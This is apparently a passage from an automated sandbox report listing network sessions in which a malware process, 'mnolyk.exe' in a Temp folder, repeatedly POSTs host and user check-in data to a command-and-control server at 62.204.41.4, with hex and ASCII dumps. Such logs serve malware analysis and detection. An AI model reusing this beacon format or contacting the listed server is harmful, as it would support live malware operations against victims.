                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:36.162766933 CET299INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:36 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          166192.168.2.64988862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:36.353709936 CET299OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:36.418462038 CET300INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:36 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          167192.168.2.64988962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:36.602318048 CET300OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:36.667840004 CET301INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:36 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          168192.168.2.64989062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:36.846820116 CET301OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:36.911346912 CET302INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:36 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          169192.168.2.64989162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:37.097124100 CET302OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:37.162909031 CET303INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:37 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          17192.168.2.64973562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:54.983577967 CET122OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:55.050860882 CET122INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:55 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          170192.168.2.64989262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:37.344208002 CET303OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:37.409373045 CET304INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:37 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          171192.168.2.64989362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:37.604134083 CET304OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:37.669632912 CET305INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:37 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          172192.168.2.64989462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:37.843817949 CET305OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:37.907027960 CET306INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:37 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          173192.168.2.64989562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:38.089699984 CET306OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:38.155802011 CET307INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:38 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          174192.168.2.64989662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:38.330965996 CET307OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:38.395314932 CET308INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:38 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          175192.168.2.64989762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:38.564289093 CET308OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:38.627590895 CET309INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:38 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          176192.168.2.64989862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:38.811964989 CET309OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:38.875428915 CET310INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:38 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          177192.168.2.64989962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:39.123661041 CET310OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:39.189034939 CET311INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:39 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          178192.168.2.64990062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:39.360455036 CET311OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:39.425144911 CET312INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:39 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          179192.168.2.64990162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:39.612533092 CET312OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:39.675569057 CET313INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:39 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          18192.168.2.64973662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:55.230834007 CET123OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:55.295732975 CET123INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:55 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          180192.168.2.64990262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:39.857997894 CET313OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:39.921566963 CET314INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:39 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          181192.168.2.64990362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:40.097750902 CET314OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:40.163037062 CET315INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          182192.168.2.64990462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:40.346550941 CET315OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:40.410402060 CET316INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          183192.168.2.64990562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:40.596380949 CET316OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:40.660595894 CET317INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          184192.168.2.64990662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:40.847690105 CET317OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
